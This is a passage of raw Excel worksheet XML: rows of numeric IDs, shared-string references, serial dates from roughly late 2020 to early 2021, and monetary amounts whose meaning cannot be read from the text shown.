      </c>
      <c r="F2178" t="s">
        <v>11605</v>
      </c>
      <c r="G2178" s="1">
        <v>44165</v>
      </c>
      <c r="H2178">
        <v>1000000</v>
      </c>
      <c r="I2178" t="s">
        <v>11606</v>
      </c>
      <c r="J2178" t="s">
        <v>9518</v>
      </c>
    </row>
    <row r="2179" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2179">
        <v>21797</v>
      </c>
      <c r="B2179">
        <v>4853</v>
      </c>
      <c r="C2179" t="s">
        <v>7347</v>
      </c>
      <c r="D2179" t="s">
        <v>11607</v>
      </c>
      <c r="E2179">
        <v>12</v>
      </c>
      <c r="F2179" t="s">
        <v>9437</v>
      </c>
      <c r="G2179" s="1">
        <v>44097</v>
      </c>
      <c r="H2179">
        <v>300000</v>
      </c>
      <c r="I2179" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2180" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2180">
        <v>21798</v>
      </c>
      <c r="B2180">
        <v>4853</v>
      </c>
      <c r="C2180" t="s">
        <v>7347</v>
      </c>
      <c r="D2180" t="s">
        <v>11607</v>
      </c>
      <c r="E2180">
        <v>12</v>
      </c>
      <c r="F2180" t="s">
        <v>11608</v>
      </c>
      <c r="G2180" s="1">
        <v>44097</v>
      </c>
      <c r="H2180">
        <v>100000</v>
      </c>
      <c r="I2180" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2181" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2181">
        <v>21799</v>
      </c>
      <c r="B2181">
        <v>4853</v>
      </c>
      <c r="C2181" t="s">
        <v>7347</v>
      </c>
      <c r="D2181" t="s">
        <v>11607</v>
      </c>
      <c r="E2181">
        <v>12</v>
      </c>
      <c r="F2181" t="s">
        <v>10502</v>
      </c>
      <c r="G2181" s="1">
        <v>44097</v>
      </c>
      <c r="H2181">
        <v>100000</v>
      </c>
      <c r="I2181" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="2182" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2182">
        <v>21800</v>
      </c>
      <c r="B2182">
        <v>721</v>
      </c>
      <c r="C2182" t="s">
        <v>16416</v>
      </c>
      <c r="D2182" t="s">
        <v>16417</v>
      </c>
      <c r="E2182">
        <v>10</v>
      </c>
      <c r="F2182" t="s">
        <v>673</v>
      </c>
      <c r="G2182" s="1">
        <v>44075</v>
      </c>
      <c r="H2182" s="4">
        <v>2326545</v>
      </c>
      <c r="J2182" t="s">
        <v>11610</v>
      </c>
    </row>
    <row r="2183" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2183">
        <v>21801</v>
      </c>
      <c r="B2183">
        <v>721</v>
      </c>
      <c r="C2183" t="s">
        <v>1790</v>
      </c>
      <c r="D2183" t="s">
        <v>11609</v>
      </c>
      <c r="E2183">
        <v>10</v>
      </c>
      <c r="F2183" t="s">
        <v>9441</v>
      </c>
      <c r="G2183" s="1">
        <v>44075</v>
      </c>
      <c r="H2183">
        <v>3360062</v>
      </c>
      <c r="J2183" t="s">
        <v>11610</v>
      </c>
    </row>
    <row r="2184" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2184">
        <v>21802</v>
      </c>
      <c r="B2184">
        <v>998</v>
      </c>
      <c r="C2184" t="s">
        <v>3369</v>
      </c>
      <c r="D2184" t="s">
        <v>11611</v>
      </c>
      <c r="E2184">
        <v>11</v>
      </c>
      <c r="F2184" t="s">
        <v>11612</v>
      </c>
      <c r="G2184" s="1">
        <v>44302</v>
      </c>
      <c r="H2184">
        <v>1000000</v>
      </c>
    </row>
    <row r="2185" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2185">
        <v>21803</v>
      </c>
      <c r="B2185">
        <v>998</v>
      </c>
      <c r="C2185" t="s">
        <v>3369</v>
      </c>
      <c r="D2185" t="s">
        <v>11611</v>
      </c>
      <c r="E2185">
        <v>11</v>
      </c>
      <c r="F2185" t="s">
        <v>9758</v>
      </c>
      <c r="G2185" s="1">
        <v>44302</v>
      </c>
      <c r="H2185">
        <v>1000000</v>
      </c>
    </row>
    <row r="2186" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2186">
        <v>21804</v>
      </c>
      <c r="B2186">
        <v>998</v>
      </c>
      <c r="C2186" t="s">
        <v>3369</v>
      </c>
      <c r="D2186" t="s">
        <v>11611</v>
      </c>
      <c r="E2186">
        <v>11</v>
      </c>
      <c r="F2186" t="s">
        <v>9437</v>
      </c>
      <c r="G2186" s="1">
        <v>44302</v>
      </c>
      <c r="H2186">
        <v>1000000</v>
      </c>
      <c r="J2186" t="s">
        <v>11613</v>
      </c>
    </row>
    <row r="2187" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2187">
        <v>21805</v>
      </c>
      <c r="B2187">
        <v>930</v>
      </c>
      <c r="C2187" t="s">
        <v>3362</v>
      </c>
      <c r="D2187" t="s">
        <v>11604</v>
      </c>
      <c r="E2187">
        <v>1</v>
      </c>
      <c r="F2187" t="s">
        <v>9900</v>
      </c>
      <c r="G2187" s="1">
        <v>44165</v>
      </c>
      <c r="H2187">
        <v>0</v>
      </c>
      <c r="J2187" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2188" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2188">
        <v>21806</v>
      </c>
      <c r="B2188">
        <v>4817</v>
      </c>
      <c r="C2188" t="s">
        <v>7313</v>
      </c>
      <c r="D2188" t="s">
        <v>11614</v>
      </c>
      <c r="E2188">
        <v>11</v>
      </c>
      <c r="F2188" t="s">
        <v>2924</v>
      </c>
      <c r="G2188" s="1">
        <v>44126</v>
      </c>
      <c r="H2188">
        <v>20000</v>
      </c>
      <c r="I2188" t="s">
        <v>11615</v>
      </c>
    </row>
    <row r="2189" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2189">
        <v>21807</v>
      </c>
      <c r="B2189">
        <v>4817</v>
      </c>
      <c r="C2189" t="s">
        <v>7313</v>
      </c>
      <c r="D2189" t="s">
        <v>11614</v>
      </c>
      <c r="E2189">
        <v>11</v>
      </c>
      <c r="F2189" t="s">
        <v>9438</v>
      </c>
      <c r="G2189" s="1">
        <v>44126</v>
      </c>
      <c r="H2189">
        <v>30000</v>
      </c>
      <c r="I2189" t="s">
        <v>11616</v>
      </c>
    </row>
    <row r="2190" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2190">
        <v>21808</v>
      </c>
      <c r="B2190">
        <v>4817</v>
      </c>
      <c r="C2190" t="s">
        <v>7313</v>
      </c>
      <c r="D2190" t="s">
        <v>11614</v>
      </c>
      <c r="E2190">
        <v>11</v>
      </c>
      <c r="F2190" t="s">
        <v>11617</v>
      </c>
      <c r="G2190" s="1">
        <v>44126</v>
      </c>
      <c r="H2190">
        <v>10000</v>
      </c>
      <c r="I2190" t="s">
        <v>11618</v>
      </c>
    </row>
    <row r="2191" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2191">
        <v>21809</v>
      </c>
      <c r="B2191">
        <v>4817</v>
      </c>
      <c r="C2191" t="s">
        <v>7313</v>
      </c>
      <c r="D2191" t="s">
        <v>11614</v>
      </c>
      <c r="E2191">
        <v>11</v>
      </c>
      <c r="F2191" t="s">
        <v>11619</v>
      </c>
      <c r="G2191" s="1">
        <v>44126</v>
      </c>
      <c r="H2191">
        <v>10000</v>
      </c>
      <c r="I2191" t="s">
        <v>11618</v>
      </c>
    </row>
    <row r="2192" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2192">
        <v>21810</v>
      </c>
      <c r="B2192">
        <v>4817</v>
      </c>
      <c r="C2192" t="s">
        <v>7313</v>
      </c>
      <c r="D2192" t="s">
        <v>11614</v>
      </c>
      <c r="E2192">
        <v>11</v>
      </c>
      <c r="F2192" t="s">
        <v>11620</v>
      </c>
      <c r="G2192" s="1">
        <v>44126</v>
      </c>
      <c r="H2192">
        <v>10000</v>
      </c>
      <c r="I2192" t="s">
        <v>11621</v>
      </c>
    </row>
    <row r="2193" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2193">
        <v>21811</v>
      </c>
      <c r="B2193">
        <v>4817</v>
      </c>
      <c r="C2193" t="s">
        <v>7313</v>
      </c>
      <c r="D2193" t="s">
        <v>11614</v>
      </c>
      <c r="E2193">
        <v>11</v>
      </c>
      <c r="F2193" t="s">
        <v>11622</v>
      </c>
      <c r="G2193" s="1">
        <v>44126</v>
      </c>
      <c r="H2193">
        <v>10000</v>
      </c>
      <c r="I2193" t="s">
        <v>11623</v>
      </c>
    </row>
    <row r="2194" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2194">
        <v>21812</v>
      </c>
      <c r="B2194">
        <v>4817</v>
      </c>
      <c r="C2194" t="s">
        <v>7313</v>
      </c>
      <c r="D2194" t="s">
        <v>11614</v>
      </c>
      <c r="E2194">
        <v>11</v>
      </c>
      <c r="F2194" t="s">
        <v>4686</v>
      </c>
      <c r="G2194" s="1">
        <v>44126</v>
      </c>
      <c r="H2194">
        <v>5000</v>
      </c>
      <c r="I2194" t="s">
        <v>11618</v>
      </c>
    </row>
    <row r="2195" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2195">
        <v>21813</v>
      </c>
      <c r="B2195">
        <v>4817</v>
      </c>
      <c r="C2195" t="s">
        <v>7313</v>
      </c>
      <c r="D2195" t="s">
        <v>11614</v>
      </c>
      <c r="E2195">
        <v>11</v>
      </c>
      <c r="F2195" t="s">
        <v>2236</v>
      </c>
      <c r="G2195" s="1">
        <v>44126</v>
      </c>
      <c r="H2195">
        <v>5000</v>
      </c>
      <c r="I2195" t="s">
        <v>11624</v>
      </c>
    </row>
    <row r="2196" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2196">
        <v>21814</v>
      </c>
      <c r="B2196">
        <v>4840</v>
      </c>
      <c r="C2196" t="s">
        <v>7352</v>
      </c>
      <c r="D2196" t="s">
        <v>11625</v>
      </c>
      <c r="E2196">
        <v>16</v>
      </c>
      <c r="F2196" t="s">
        <v>9929</v>
      </c>
      <c r="G2196" s="1">
        <v>44090</v>
      </c>
      <c r="H2196">
        <v>1000</v>
      </c>
      <c r="I2196" t="s">
        <v>11626</v>
      </c>
    </row>
    <row r="2197" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2197">
        <v>21818</v>
      </c>
      <c r="B2197">
        <v>2296</v>
      </c>
      <c r="C2197" t="s">
        <v>6199</v>
      </c>
      <c r="D2197" t="s">
        <v>11627</v>
      </c>
      <c r="E2197">
        <v>33</v>
      </c>
      <c r="F2197" t="s">
        <v>11628</v>
      </c>
      <c r="G2197" s="1">
        <v>44053</v>
      </c>
      <c r="H2197">
        <v>50000</v>
      </c>
      <c r="I2197" t="s">
        <v>9693</v>
      </c>
      <c r="J2197" t="s">
        <v>11629</v>
      </c>
    </row>
    <row r="2198" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2198">
        <v>21819</v>
      </c>
      <c r="B2198">
        <v>2296</v>
      </c>
      <c r="C2198" t="s">
        <v>6199</v>
      </c>
      <c r="D2198" t="s">
        <v>11627</v>
      </c>
      <c r="E2198">
        <v>33</v>
      </c>
      <c r="F2198" t="s">
        <v>9437</v>
      </c>
      <c r="G2198" s="1">
        <v>44053</v>
      </c>
      <c r="H2198">
        <v>50000</v>
      </c>
      <c r="I2198" t="s">
        <v>9550</v>
      </c>
      <c r="J2198" t="s">
        <v>11630</v>
      </c>
    </row>
    <row r="2199" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2199">
        <v>21820</v>
      </c>
      <c r="B2199">
        <v>2296</v>
      </c>
      <c r="C2199" t="s">
        <v>6199</v>
      </c>
      <c r="D2199" t="s">
        <v>11627</v>
      </c>
      <c r="E2199">
        <v>33</v>
      </c>
      <c r="F2199" t="s">
        <v>3763</v>
      </c>
      <c r="G2199" s="1">
        <v>44053</v>
      </c>
      <c r="H2199">
        <v>100000</v>
      </c>
      <c r="I2199" t="s">
        <v>9693</v>
      </c>
      <c r="J2199" t="s">
        <v>11630</v>
      </c>
    </row>
    <row r="2200" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2200">
        <v>21821</v>
      </c>
      <c r="B2200">
        <v>2817</v>
      </c>
      <c r="C2200" t="s">
        <v>7031</v>
      </c>
      <c r="D2200" t="s">
        <v>11631</v>
      </c>
      <c r="E2200">
        <v>16</v>
      </c>
      <c r="F2200" t="s">
        <v>11632</v>
      </c>
      <c r="G2200" s="1">
        <v>44176</v>
      </c>
      <c r="H2200">
        <v>936000</v>
      </c>
      <c r="I2200" t="s">
        <v>11633</v>
      </c>
      <c r="J2200" t="s">
        <v>11634</v>
      </c>
    </row>
    <row r="2201" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2201">
        <v>21822</v>
      </c>
      <c r="B2201">
        <v>1149</v>
      </c>
      <c r="C2201" t="s">
        <v>2525</v>
      </c>
      <c r="D2201" t="s">
        <v>9828</v>
      </c>
      <c r="E2201">
        <v>6</v>
      </c>
      <c r="F2201" t="s">
        <v>11635</v>
      </c>
      <c r="G2201" s="1">
        <v>44116</v>
      </c>
      <c r="H2201">
        <v>21000</v>
      </c>
      <c r="I2201" t="s">
        <v>9550</v>
      </c>
      <c r="J2201" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2202" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2202">
        <v>21823</v>
      </c>
      <c r="B2202">
        <v>1149</v>
      </c>
      <c r="C2202" t="s">
        <v>2525</v>
      </c>
      <c r="D2202" t="s">
        <v>9828</v>
      </c>
      <c r="E2202">
        <v>6</v>
      </c>
      <c r="F2202" t="s">
        <v>3814</v>
      </c>
      <c r="G2202" s="1">
        <v>44116</v>
      </c>
      <c r="H2202">
        <v>14400</v>
      </c>
      <c r="I2202" t="s">
        <v>9550</v>
      </c>
      <c r="J2202" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2203" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2203">
        <v>21824</v>
      </c>
      <c r="B2203">
        <v>1149</v>
      </c>
      <c r="C2203" t="s">
        <v>2525</v>
      </c>
      <c r="D2203" t="s">
        <v>9828</v>
      </c>
      <c r="E2203">
        <v>6</v>
      </c>
      <c r="F2203" t="s">
        <v>1746</v>
      </c>
      <c r="G2203" s="1">
        <v>44116</v>
      </c>
      <c r="H2203">
        <v>7200</v>
      </c>
      <c r="I2203" t="s">
        <v>11636</v>
      </c>
      <c r="J2203" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2204" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2204">
        <v>21825</v>
      </c>
      <c r="B2204">
        <v>1149</v>
      </c>
      <c r="C2204" t="s">
        <v>2525</v>
      </c>
      <c r="D2204" t="s">
        <v>9828</v>
      </c>
      <c r="E2204">
        <v>6</v>
      </c>
      <c r="F2204" t="s">
        <v>9676</v>
      </c>
      <c r="G2204" s="1">
        <v>44116</v>
      </c>
      <c r="H2204">
        <v>7000</v>
      </c>
      <c r="I2204" t="s">
        <v>9550</v>
      </c>
      <c r="J2204" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2205" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2205">
        <v>21826</v>
      </c>
      <c r="B2205">
        <v>1149</v>
      </c>
      <c r="C2205" t="s">
        <v>2525</v>
      </c>
      <c r="D2205" t="s">
        <v>9828</v>
      </c>
      <c r="E2205">
        <v>6</v>
      </c>
      <c r="F2205" t="s">
        <v>9561</v>
      </c>
      <c r="G2205" s="1">
        <v>44116</v>
      </c>
      <c r="H2205">
        <v>14400</v>
      </c>
      <c r="I2205" t="s">
        <v>9550</v>
      </c>
      <c r="J2205" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2206" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2206">
        <v>21827</v>
      </c>
      <c r="B2206">
        <v>1149</v>
      </c>
      <c r="C2206" t="s">
        <v>2525</v>
      </c>
      <c r="D2206" t="s">
        <v>9828</v>
      </c>
      <c r="E2206">
        <v>6</v>
      </c>
      <c r="F2206" t="s">
        <v>9533</v>
      </c>
      <c r="G2206" s="1">
        <v>44116</v>
      </c>
      <c r="H2206">
        <v>7000</v>
      </c>
      <c r="I2206" t="s">
        <v>9550</v>
      </c>
      <c r="J2206" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2207" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2207">
        <v>21828</v>
      </c>
      <c r="B2207">
        <v>1149</v>
      </c>
      <c r="C2207" t="s">
        <v>2525</v>
      </c>
      <c r="D2207" t="s">
        <v>9828</v>
      </c>
      <c r="E2207">
        <v>6</v>
      </c>
      <c r="F2207" t="s">
        <v>9681</v>
      </c>
      <c r="G2207" s="1">
        <v>44116</v>
      </c>
      <c r="H2207">
        <v>7500</v>
      </c>
      <c r="I2207" t="s">
        <v>9550</v>
      </c>
      <c r="J2207" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2208" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2208">
        <v>21829</v>
      </c>
      <c r="B2208">
        <v>1149</v>
      </c>
      <c r="C2208" t="s">
        <v>2525</v>
      </c>
      <c r="D2208" t="s">
        <v>9828</v>
      </c>
      <c r="E2208">
        <v>6</v>
      </c>
      <c r="F2208" t="s">
        <v>11637</v>
      </c>
      <c r="G2208" s="1">
        <v>44116</v>
      </c>
      <c r="H2208">
        <v>21000</v>
      </c>
      <c r="I2208" t="s">
        <v>9550</v>
      </c>
      <c r="J2208" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2209" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2209">
        <v>21830</v>
      </c>
      <c r="B2209">
        <v>1149</v>
      </c>
      <c r="C2209" t="s">
        <v>2525</v>
      </c>
      <c r="D2209" t="s">
        <v>9828</v>
      </c>
      <c r="E2209">
        <v>6</v>
      </c>
      <c r="F2209" t="s">
        <v>11638</v>
      </c>
      <c r="G2209" s="1">
        <v>44116</v>
      </c>
      <c r="H2209">
        <v>7200</v>
      </c>
      <c r="I2209" t="s">
        <v>9550</v>
      </c>
      <c r="J2209" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2210" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2210">
        <v>21831</v>
      </c>
      <c r="B2210">
        <v>1149</v>
      </c>
      <c r="C2210" t="s">
        <v>2525</v>
      </c>
      <c r="D2210" t="s">
        <v>9828</v>
      </c>
      <c r="E2210">
        <v>6</v>
      </c>
      <c r="F2210" t="s">
        <v>11639</v>
      </c>
      <c r="G2210" s="1">
        <v>44116</v>
      </c>
      <c r="H2210">
        <v>144000</v>
      </c>
      <c r="I2210" t="s">
        <v>9550</v>
      </c>
      <c r="J2210" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2211" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2211">
        <v>21833</v>
      </c>
      <c r="B2211">
        <v>4422</v>
      </c>
      <c r="C2211" t="s">
        <v>16418</v>
      </c>
      <c r="D2211" t="s">
        <v>16419</v>
      </c>
      <c r="E2211">
        <v>29</v>
      </c>
      <c r="F2211" t="s">
        <v>11641</v>
      </c>
      <c r="G2211" s="1">
        <v>44067</v>
      </c>
      <c r="H2211" s="4">
        <v>60000</v>
      </c>
      <c r="I2211" t="s">
        <v>11642</v>
      </c>
    </row>
    <row r="2212" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2212">
        <v>21834</v>
      </c>
      <c r="B2212">
        <v>4422</v>
      </c>
      <c r="C2212" t="s">
        <v>4780</v>
      </c>
      <c r="D2212" t="s">
        <v>11640</v>
      </c>
      <c r="E2212">
        <v>29</v>
      </c>
      <c r="F2212" t="s">
        <v>11643</v>
      </c>
      <c r="G2212" s="1">
        <v>44067</v>
      </c>
      <c r="H2212">
        <v>0</v>
      </c>
      <c r="I2212" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2213" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2213">
        <v>21835</v>
      </c>
      <c r="B2213">
        <v>4422</v>
      </c>
      <c r="C2213" t="s">
        <v>4780</v>
      </c>
      <c r="D2213" t="s">
        <v>11640</v>
      </c>
      <c r="E2213">
        <v>29</v>
      </c>
      <c r="F2213" t="s">
        <v>2236</v>
      </c>
      <c r="G2213" s="1">
        <v>44067</v>
      </c>
      <c r="H2213">
        <v>0</v>
      </c>
      <c r="I2213" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="2214" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2214">
        <v>21836</v>
      </c>
      <c r="B2214">
        <v>1057</v>
      </c>
      <c r="C2214" t="s">
        <v>2895</v>
      </c>
      <c r="D2214" t="s">
        <v>9768</v>
      </c>
      <c r="E2214">
        <v>11</v>
      </c>
      <c r="F2214" t="s">
        <v>11644</v>
      </c>
      <c r="G2214" s="1">
        <v>44061</v>
      </c>
      <c r="H2214">
        <v>150000</v>
      </c>
      <c r="J2214" t="s">
        <v>11645</v>
      </c>
    </row>
    <row r="2215" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2215">
        <v>21837</v>
      </c>
      <c r="B2215">
        <v>1057</v>
      </c>
      <c r="C2215" t="s">
        <v>2895</v>
      </c>
      <c r="D2215" t="s">
        <v>9768</v>
      </c>
      <c r="E2215">
        <v>11</v>
      </c>
      <c r="F2215" t="s">
        <v>1746</v>
      </c>
      <c r="G2215" s="1">
        <v>44061</v>
      </c>
      <c r="H2215">
        <v>300000</v>
      </c>
      <c r="J2215" t="s">
        <v>11645</v>
      </c>
    </row>
    <row r="2216" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2216">
        <v>21838</v>
      </c>
      <c r="B2216">
        <v>1057</v>
      </c>
      <c r="C2216" t="s">
        <v>2895</v>
      </c>
      <c r="D2216" t="s">
        <v>11646</v>
      </c>
      <c r="E2216">
        <v>11</v>
      </c>
      <c r="F2216" t="s">
        <v>9437</v>
      </c>
      <c r="G2216" s="1">
        <v>44061</v>
      </c>
      <c r="H2216">
        <v>700000</v>
      </c>
      <c r="J2216" t="s">
        <v>11645</v>
      </c>
    </row>
    <row r="2217" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2217">
        <v>21847</v>
      </c>
      <c r="B2217">
        <v>2243</v>
      </c>
      <c r="C2217" t="s">
        <v>6214</v>
      </c>
      <c r="D2217" t="s">
        <v>11647</v>
      </c>
      <c r="E2217">
        <v>11</v>
      </c>
      <c r="F2217" t="s">
        <v>2924</v>
      </c>
      <c r="G2217" s="1">
        <v>44102</v>
      </c>
      <c r="H2217">
        <v>0</v>
      </c>
      <c r="I2217" t="s">
        <v>11648</v>
      </c>
    </row>
    <row r="2218" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2218">
        <v>21848</v>
      </c>
      <c r="B2218">
        <v>2243</v>
      </c>
      <c r="C2218" t="s">
        <v>6214</v>
      </c>
      <c r="D2218" t="s">
        <v>11647</v>
      </c>
      <c r="E2218">
        <v>11</v>
      </c>
      <c r="F2218" t="s">
        <v>9438</v>
      </c>
      <c r="G2218" s="1">
        <v>44102</v>
      </c>
      <c r="H2218">
        <v>0</v>
      </c>
      <c r="I2218" t="s">
        <v>11649</v>
      </c>
    </row>
    <row r="2219" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2219">
        <v>21849</v>
      </c>
      <c r="B2219">
        <v>618</v>
      </c>
      <c r="C2219" t="s">
        <v>1719</v>
      </c>
      <c r="D2219" t="s">
        <v>11524</v>
      </c>
      <c r="E2219">
        <v>13</v>
      </c>
      <c r="F2219" t="s">
        <v>7241</v>
      </c>
      <c r="G2219" s="1">
        <v>44091</v>
      </c>
      <c r="H2219">
        <v>0</v>
      </c>
      <c r="I2219" t="s">
        <v>11650</v>
      </c>
      <c r="J2219" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2220" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2220">
        <v>21850</v>
      </c>
      <c r="B2220">
        <v>502</v>
      </c>
      <c r="C2220" t="s">
        <v>914</v>
      </c>
      <c r="D2220" t="s">
        <v>11651</v>
      </c>
      <c r="E2220">
        <v>15</v>
      </c>
      <c r="F2220" t="s">
        <v>11652</v>
      </c>
      <c r="G2220" s="1">
        <v>44046</v>
      </c>
      <c r="H2220">
        <v>600</v>
      </c>
      <c r="I2220" t="s">
        <v>11653</v>
      </c>
    </row>
    <row r="2221" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2221">
        <v>21851</v>
      </c>
      <c r="B2221">
        <v>577</v>
      </c>
      <c r="C2221" t="s">
        <v>1782</v>
      </c>
      <c r="D2221" t="s">
        <v>11654</v>
      </c>
      <c r="E2221">
        <v>28</v>
      </c>
      <c r="F2221" t="s">
        <v>9437</v>
      </c>
      <c r="G2221" s="1">
        <v>44167</v>
      </c>
      <c r="H2221">
        <v>350000</v>
      </c>
      <c r="I2221" t="s">
        <v>9536</v>
      </c>
      <c r="J2221" t="s">
        <v>11655</v>
      </c>
    </row>
    <row r="2222" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2222">
        <v>21852</v>
      </c>
      <c r="B2222">
        <v>577</v>
      </c>
      <c r="C2222" t="s">
        <v>1782</v>
      </c>
      <c r="D2222" t="s">
        <v>11654</v>
      </c>
      <c r="E2222">
        <v>28</v>
      </c>
      <c r="F2222" t="s">
        <v>11656</v>
      </c>
      <c r="G2222" s="1">
        <v>44167</v>
      </c>
      <c r="H2222">
        <v>10000</v>
      </c>
      <c r="I2222" t="s">
        <v>9693</v>
      </c>
      <c r="J2222" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2223" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2223">
        <v>21853</v>
      </c>
      <c r="B2223">
        <v>577</v>
      </c>
      <c r="C2223" t="s">
        <v>1782</v>
      </c>
      <c r="D2223" t="s">
        <v>11654</v>
      </c>
      <c r="E2223">
        <v>28</v>
      </c>
      <c r="F2223" t="s">
        <v>11657</v>
      </c>
      <c r="G2223" s="1">
        <v>44167</v>
      </c>
      <c r="H2223">
        <v>150000</v>
      </c>
      <c r="I2223" t="s">
        <v>9693</v>
      </c>
      <c r="J2223" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="2224" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2224">
        <v>21854</v>
      </c>
      <c r="B2224">
        <v>577</v>
      </c>
      <c r="C2224" t="s">
        <v>1782</v>
      </c>
      <c r="D2224" t="s">
        <v>11654</v>
      </c>
      <c r="E2224">
        <v>28</v>
      </c>
      <c r="F2224" t="s">
        <v>11658</v>
      </c>
      <c r="G2224" s="1">
        <v>44167</v>
      </c>
      <c r="H2224">
        <v>300</v>
      </c>
      <c r="I2224" t="s">
        <v>9550</v>
      </c>
      <c r="J2224" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2225" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2225">
        <v>21855</v>
      </c>
      <c r="B2225">
        <v>577</v>
      </c>
      <c r="C2225" t="s">
        <v>1782</v>
      </c>
      <c r="D2225" t="s">
        <v>11654</v>
      </c>
      <c r="E2225">
        <v>28</v>
      </c>
      <c r="F2225" t="s">
        <v>7241</v>
      </c>
      <c r="G2225" s="1">
        <v>44167</v>
      </c>
      <c r="H2225">
        <v>1000</v>
      </c>
      <c r="I2225" t="s">
        <v>9536</v>
      </c>
      <c r="J2225" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2226" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2226">
        <v>21856</v>
      </c>
      <c r="B2226">
        <v>2332</v>
      </c>
      <c r="C2226" t="s">
        <v>16420</v>
      </c>
      <c r="D2226" t="s">
        <v>16421</v>
      </c>
      <c r="E2226">
        <v>13</v>
      </c>
      <c r="F2226" t="s">
        <v>11659</v>
      </c>
      <c r="G2226" s="1">
        <v>44067</v>
      </c>
      <c r="H2226" s="4">
        <v>200000</v>
      </c>
      <c r="I2226" t="s">
        <v>11660</v>
      </c>
      <c r="J2226" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2227" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2227">
        <v>21859</v>
      </c>
      <c r="B2227">
        <v>1558</v>
      </c>
      <c r="C2227" t="s">
        <v>3373</v>
      </c>
      <c r="D2227" t="s">
        <v>11661</v>
      </c>
      <c r="E2227">
        <v>11</v>
      </c>
      <c r="F2227" t="s">
        <v>364</v>
      </c>
      <c r="G2227" s="1">
        <v>44155</v>
      </c>
      <c r="H2227">
        <v>80000</v>
      </c>
      <c r="I2227" t="s">
        <v>11662</v>
      </c>
    </row>
    <row r="2228" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2228">
        <v>21860</v>
      </c>
      <c r="B2228">
        <v>469</v>
      </c>
      <c r="C2228" t="s">
        <v>1626</v>
      </c>
      <c r="D2228" t="s">
        <v>11336</v>
      </c>
      <c r="E2228">
        <v>12</v>
      </c>
      <c r="F2228" t="s">
        <v>9925</v>
      </c>
      <c r="G2228" s="1">
        <v>44075</v>
      </c>
      <c r="H2228">
        <v>10000</v>
      </c>
      <c r="I2228" t="s">
        <v>10442</v>
      </c>
    </row>
    <row r="2229" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2229">
        <v>21861</v>
      </c>
      <c r="B2229">
        <v>360</v>
      </c>
      <c r="C2229" t="s">
        <v>233</v>
      </c>
      <c r="D2229" t="s">
        <v>9608</v>
      </c>
      <c r="E2229">
        <v>12</v>
      </c>
      <c r="F2229" t="s">
        <v>11663</v>
      </c>
      <c r="G2229" s="1">
        <v>44119</v>
      </c>
      <c r="H2229">
        <v>1000000</v>
      </c>
      <c r="J2229" t="s">
        <v>10280</v>
      </c>
    </row>
